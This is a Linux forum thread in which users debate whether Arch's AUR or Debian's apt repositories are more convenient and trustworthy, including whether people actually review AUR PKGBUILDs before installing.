this post was submitted on 28 Feb 2024
-28 points (36.0% liked)

Linux

48287 readers
638 users here now

From Wikipedia, the free encyclopedia

Linux is a family of open source Unix-like operating systems based on the Linux kernel, an operating system kernel first released on September 17, 1991 by Linus Torvalds. Linux is typically packaged in a Linux distribution (or distro for short).

Distributions include the Linux kernel and supporting system software and libraries, many of which are provided by the GNU Project. Many Linux distributions use the word "Linux" in their name, but the Free Software Foundation uses the name GNU/Linux to emphasize the importance of GNU software, causing some controversy.

Rules

Related Communities

Community icon by Alpár-Etele Méder, licensed under CC BY 3.0

founded 5 years ago
MODERATORS
 

So the thing with Debian and any Debian based distro like Ubuntu or Linux Mint is there is no big centralized software repo like the AUR. Yes there is the apt repository but if you want something that's not in there, get ready to read the documentation or follow random guides.

For example, one of my friends wanted to download an audio tool called Reaper. On Windows this is just looking up the application and clicking on the .exe. It really depends on the dev if they include a .deb, sometimes you might need to download the .sh file or they may tell you to compile it yourself. Perhaps, you have to add a ppa. On Arch, all I have to do is Paru -S Reaper, if there are multiple Reapers I can look for that by typing Paru Reaper.

Now that Arch is so easy to install with the Archscript, and the software repo so vast and easy to use, is Debian really user friendly if you have to jump through several hoops to download programs?

Edit: yeah yeah there's flathub and stuff but that's more of a last resort, optimally, you want to get it the correct way.

you are viewing a single comment's thread
view the rest of the comments
[–] constantokra@lemmy.one 11 points 8 months ago (3 children)

Do you look at the stuff in the aur? Because any of that stuff you install from there could be messed with because it's a user repository. I specifically left arch because I had to look into all the packages I installed from the aur, and the stuff from the official repos was pretty limited compared to something like Debian. That took a lot of time. Or, you could always just install whatever you find with zero concern about security.

I've been running Debian for decades with maybe 2 problems I had to manually resolve with apt. I ran arch and manjaro for maybe a year, and had a handful. I'm certainly not going to say not to run arch, but it's in no way easier to keep running than Debian. That's literally Debian's whole gig.

[–] yianiris@kafeneio.social 2 points 8 months ago (1 children)

In all the years I've used the AUR I only heard of one pkg violating security, it was recognized pretty fast and was removed within hours from going up. AUR pkgs have history/track/votes on them, with thousands using them it is just as likely an official pkg having rogue code as an aur pkg.

Also, aur pkg are not really software written for the aur, it is software packaged for the arch ecosystem, and several other distros are using them.

@constantokra @pineapplelover

[–] constantokra@lemmy.one 4 points 8 months ago (2 children)

Right, and that's a good reason why you should feel reasonably comfortable installing very popular software from the aur, once it's been there for a while. That's not why people like the aur.

People like that you can get even unpopular stuff in the aur, and that's the stuff you need to be suspicious of. If you're getting some niche y2k era packet radio software from the aur, you should be checking how it's packaged and what is actually being packaged. And if you have the knowledge to do that you might as well get the source and install it yourself. I'll admit that i'm getting old, and I don't know if that's something people aren't willing or able to do these days.

Maybe i'm just cranky about arch, but it just seems really stupid to me to go through manually installing and setting up your system just to either install some random crap from the aur, or have to manually review it all because the official repos are pretty bare.

[–] yianiris@kafeneio.social 0 points 8 months ago (1 children)

1 If you take an average AUR pkg and read its content (PKGBUILD) the procedure of building an arch like pkg is not very much unlike the practice of building and installing from source as in the old days. The difference is that when a new revision or need for patch, or rebuild due to fresh libraries/dependencies is necessary through your AUR helper you will be notified.

@constantokra

[–] constantokra@lemmy.one 2 points 8 months ago (1 children)

Yes. It is possible to verify what's going on. That's what I did when I used the aur. Do you think most people do that, or even look at see how many users are using the software? Or do you imagine they just install it blindly?

If you ever see a help video or article that suggests installing something from source, or run some script people generally tell the reader that they shouldn't just run random code without looking at it. I've never once seen anything that suggested people should check the pkgbuild. I don't have a problem with the aur. I just think it's not nearly as trustworthy as it's generally made out to be, and I don't think people generally understand that it might even be a concern, or that you can check the validity of the package yourself.

[–] yianiris@kafeneio.social 2 points 8 months ago

One out of five pkgs in AUR are so unmaintained they don't even build anymore.

Clieaning up junk is more urgent than screening what comes on.
@constantokra

[–] yianiris@kafeneio.social 0 points 8 months ago (1 children)

2 Do you honestly think one can just make a fake account up, register, and publish an AUR pkg with rogue code that easy? There are checks for code whether it is safe or not, whether it is asking for right elevation, altering the filesystem's rights, etc.
You are making it sound like registering for X and publishing a tweet.

3 The most dangerous software I see on AUR is browser bins by the BIG NAMES not the little script stuff.
People are afraid of people instead of large corps
@constantokra

[–] constantokra@lemmy.one 4 points 8 months ago

I think people can hide lots of things in code, especially when people don't generally look at it. And I know people don't look at it when they talk about how convenient the aur is. It's at best marginally more convenient than installing from source.

I'm not at all suggesting that people should place more trust in large companies. I'm suggesting that packages in the aur with lots and lots of users should be trusted more, specifically because some of them will be checking out the pkgbuild, and the source, and presumably some of them would notice if the software did something it wasn't supposed to do. Obviously the larger the software the harder that all is to check, and correspondingly you'd want to see many more users using it before you'd extend it any trust.

My point being, i've not seen these discussions taking place. Maybe I've just missed them. But I feel like it's appropriate to bring it up when I see people talking about just how.convenient the aur is. It's really not that convenient if you're using it in a way that i'd consider reasonable.

[–] Aatube@kbin.social 1 points 8 months ago

I think that's a Manjarno problem.

[–] pineapplelover@lemm.ee 1 points 8 months ago (2 children)

When you download new programs how do you do so? You just install flatpak or what?

[–] Aatube@kbin.social 4 points 8 months ago

New packages on flathub are moderated, though I haven't encountered any problems from AUR's moderation model either other than it sometimes being slow but harmful stuff is removed pretty fast

[–] constantokra@lemmy.one 3 points 8 months ago

Ordinarily I use apt. Sometimes a flatpak if I trust the source. Otherwise it's from source or usually something i'm running in docker, where I'll check what it's actually doing if i'm at all suspicious.

I don't want to make too big a deal of the aur. When I was using arch and I needed something from the aur it was easy enough to see that it was a legitimately packaged piece of software. The only big deal is that it's a real pain in the ass, and I know most people aren't doing that, and I never see anyone mention it so I doubt people even consider that it could be an issue.

It comes down to what you trust. I trust the stuff I can get from Debian's repos. I trust some other sources, and everything else I look at. I don't trust the aur, and I sincerely doubt most people look at the software they're installing from it to make sure it's legit.

It's really none of my business what others are comfortable with. The trustworthiness of where you get your software is a decision you have to make for yourself, and with the way people go on about the aur I get the feeling they don't bother to decide. I don't ever hear anyone acknowledge that there's any sort of difference between the aur and Debian's repos, but that's just frankly an utterly absurd idea.